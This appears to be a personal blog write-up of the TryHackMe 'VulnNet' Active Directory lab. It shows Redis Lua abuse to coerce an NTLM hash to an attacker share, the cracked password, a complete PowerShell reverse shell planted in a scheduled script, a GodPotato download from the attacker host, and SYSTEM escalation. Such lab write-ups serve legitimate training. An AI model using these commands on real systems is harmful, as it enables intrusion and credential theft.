File Nº 0x6D / Subject: m0rgxn
Local --:--:--
← All writeupsCase 06 · Filed 29 Jan 2026 · TryHackMe · 1 min read

VulnNet

Rooted

First TryHackMe Active Directory room


Evidence photo — case 06
Bash
PORT    STATE SERVICE       REASON          VERSION
53/tcp  open  domain        syn-ack ttl 126 Simple DNS Plus
135/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack ttl 126
464/tcp open  kpasswd5?     syn-ack ttl 126
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/29%OT=53%CT=%CU=%PV=Y%DS=3%DC=T%G=N%TM=697BE1FA%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
OPS(O1=M4E8NW8NNS%O2=M4E8NW8NNS%O3=M4E8NW8%O4=M4E8NW8NNS%O5=M4E8NW8NNS%O6=M4E8NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M4E8NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time: 
|   date: 2026-01-29T22:40:20
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 11830/tcp): CLEAN (Timeout)
|   Check 2 (port 54791/tcp): CLEAN (Timeout)
|   Check 3 (port 18565/udp): CLEAN (Timeout)
|   Check 4 (port 43311/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   200.66 ms 192.168.128.1
2   ...
3   200.65 ms 10.64.135.63


Bash
[Jan 29, 2026 - 23:43:57 (CET)] exegol-D3xt3R VulnNet # enum4linux-ng -P 10.64.135.63
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.64.1203135.63
[*] Username ......... ''
[*] Random Username .. 'ponijyhg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Listener Scan on 10.64.135.63    |
 =====================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =========================================
|    SMB Dialect Check on 10.64.135.63    |
 =========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 ===========================================================
|    Domain Information via SMB session for 10.64.135.63    |
 ===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET

 =========================================
|    RPC Session Check on 10.64.135.63    |
 =========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 ===================================================
|    Domain Information via RPC for 10.64.135.63    |
 ===================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member

 =========================================
|    Policies via RPC for 10.64.135.63    |
 =========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed


After trying anonymous/guest enumeration of the AD, I wasn't able to get authenticated to any service running at the AD so I redid the scan on all ports, I realised that i missed a redis port.
Bash
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
6379/tcp  open  redis
9389/tcp  open  adws
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49677/tcp open  unknown
49693/tcp open  unknown

The redis service didn't require any type of authentication and it used Lua as an embedded interpreter. I used the eval function to coerce the authentication and get the hash for the account running the service.
Bash
[Jan 30, 2026 - 00:30:16 (CET)] exegol-D3xt3R attacktiveDirectory # redis-cli -h 10.64.165.128
10.64.165.128:6379> info server
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:4028
run_id:de09a25fb80a056dfbed40b7142715506756d8a8
tcp_port:6379
uptime_in_seconds:3306
uptime_in_days:0
hz:10
lru_clock:8122016
config_file:
10.64.165.128:6379> eval "dofile('//192.168.162.156/share')" 0 

I set up responder and got the NTLMv2 hash.
Bash
Listening for events...

[SMB] NTLMv2-SSP Client   : 10.64.165.128
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash     : enterprise-security::VULNNET:1122334455667788:28A952BE392663B7C455ED93F2E5338F:0101000000000000005FD0B78091DC01FA997DEE7254AD1B000000000200080044005A0048004A0001001E00570049004E002D00430037004A0048003000580033004D0038004F00420004003400570049004E002D00430037004A0048003000580033004D0038004F0042002E0044005A0048004A002E004C004F00430041004C000300140044005A0048004A002E004C004F00430041004C000500140044005A0048004A002E004C004F00430041004C0007000800005FD0B78091DC01060004000200000008003000300000000000000000000000003000003746C6ED61A2D2EBC5DCF66E735EA388B69D0BDDF7830FE8B4C5E543764C49E70A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100360032002E003100350036000000000000000000


I cracked it using hashcat and got the password for enterprise-security.
Bash
[Jan 30, 2026 - 00:46:18 (CET)] exegol-D3xt3R VulnNet # hashcat hash --show                           
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

ENTERPRISE-SECURITY::VULNNET:1122334455667788:28a952be392663b7c455ed93f2e5338f:0101000000000000005fd0b78091dc01fa997dee7254ad1b000000000200080044005a0048004a0001001e00570049004e002d00430037004a0048003000580033004d0038004f00420004003400570049004e002d00430037004a0048003000580033004d0038004f0042002e0044005a0048004a002e004c004f00430041004c000300140044005a0048004a002e004c004f00430041004c000500140044005a0048004a002e004c004f00430041004c0007000800005fd0b78091dc01060004000200000008003000300000000000000000000000003000003746c6ed61a2d2ebc5dcf66e735ea388b69d0bddf7830fe8b4c5e543764c49e70a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100360032002e003100350036000000000000000000:sand_0873959498

I checked for non-default shares available for this user and fond one.
Bash
[Jan 30, 2026 - 17:42:24 (CET)] exegol-D3xt3R VulnNet # nxc smb VULNNET-BC3TCK1 -u 'enterprise-security' -p 'sand_0873959498' --shares --no-bruteforce
SMB         10.67.183.14    445    VULNNET-BC3TCK1  [*] Windows 10 / Server 2019 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False) 
SMB         10.67.183.14    445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 
SMB         10.67.183.14    445    VULNNET-BC3TCK1  [*] Enumerated shares
SMB         10.67.183.14    445    VULNNET-BC3TCK1  Share           Permissions     Remark
SMB         10.67.183.14    445    VULNNET-BC3TCK1  -----           -----------     ------
SMB         10.67.183.14    445    VULNNET-BC3TCK1  ADMIN$                          Remote Admin
SMB         10.67.183.14    445    VULNNET-BC3TCK1  C$                              Default share
SMB         10.67.183.14    445    VULNNET-BC3TCK1  Enterprise-Share READ,WRITE      
SMB         10.67.183.14    445    VULNNET-BC3TCK1  IPC$            READ            Remote IPC
SMB         10.67.183.14    445    VULNNET-BC3TCK1  NETLOGON        READ            Logon server share 
SMB         10.67.183.14    445    VULNNET-BC3TCK1  SYSVOL          READ            Logon server share 

It's better to use netexec with smb enumeration as it gives back the privileges that the user has on all the shares. I found a script likely running as a scheduled task, it appeared to be removing irrelevant files, knowing that the user can write to the share we can inject a reverse shell powershell script to get a reverse shell as the user since winrm nor rdp are enabled .
Bash
[Jan 30, 2026 - 17:46:06 (CET)] exegol-D3xt3R VulnNet # smbclient  -U "enterprise-security"  \\\\10.67.183.14\\Enterprise-Share 
Password for [WORKGROUP\enterprise-security]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan 30 17:42:47 2026
  ..                                  D        0  Fri Jan 30 17:42:47 2026
  PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 01:33:18 2021

		9558271 blocks of size 4096. 5147445 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1 
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
[Jan 30, 2026 - 17:47:03 (CET)] exegol-D3xt3R VulnNet # cat PurgeIrrelevantData_1826.ps1 
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

Here is the powershell script that would overwrite the existing one.
Bash
[Jan 30, 2026 - 17:53:17 (CET)] exegol-D3xt3R VulnNet # cat PurgeIrrelevantData_1826.ps1 
$client = New-Object System.Net.Sockets.TCPClient('192.168.162.156',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

Set up a listener with rlwrap to get a stabler shell.
Bash
[Jan 30, 2026 - 17:51:20 (CET)] exegol-D3xt3R VulnNet # rlwrap nc -nlvp 4444      
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.67.183.14.
Ncat: Connection from 10.67.183.14:49866.
ls


    Directory: C:\Users\enterprise-security\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/23/2021   2:29 PM                nssm-2.24-101-g897c7ad                                                
d-----        2/26/2021  12:14 PM                Redis-x64-2.8.2402                                                    
-a----        2/26/2021  10:37 AM            143 startup.bat                                                           


We successfully got a powershell session as the user. I found out that the user had SeImpersonatePrivilege enabled.
Bash
PS C:\Users\enterprise-security\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
		
I uploaded GodPotato to abuse the privilege to get the final flag.
Bash
PS C:\Users\enterprise-security\Downloads> iwr http://192.168.162.156:8000/GodPotato-NET4.exe -outfile gp.exe 
PS C:\Users\enterprise-security\Downloads> .\gp.exe -cmd 'whoami' 
[*] CombaseModule: 0x140718969323520
[*] DispatchTable: 0x140718971641008
[*] UseProtseqFunction: 0x140718971019904
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\444d987e-ba3e-4333-93d2-9f2510e8eaff\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006402-0d4c-ffff-424e-6984dfdd7ac9
[*] DCOM obj OXID: 0xd16d1fea17b29bc9
[*] DCOM obj OID: 0x4584e7ff5a1564e4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 848 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2304

We can see here that the process was ran as NT AUTHORITY\SYSTEM. After that I simply got the flag.
Bash
PS C:\Users\enterprise-security\Downloads> .\gp.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"
[*] CombaseModule: 0x140718969323520
[*] DispatchTable: 0x140718971641008
[*] UseProtseqFunction: 0x140718971019904
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\615d75b0-298d-40ed-a03b-4d45d659f334\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f002-07e0-ffff-88a7-f4195fa0655b
[*] DCOM obj OXID: 0x6e3c215e6bcc1d43
[*] DCOM obj OID: 0x11623fdccb326828
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 848 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 940
THM{REDACTED}

Happy pwning :)
§ Contents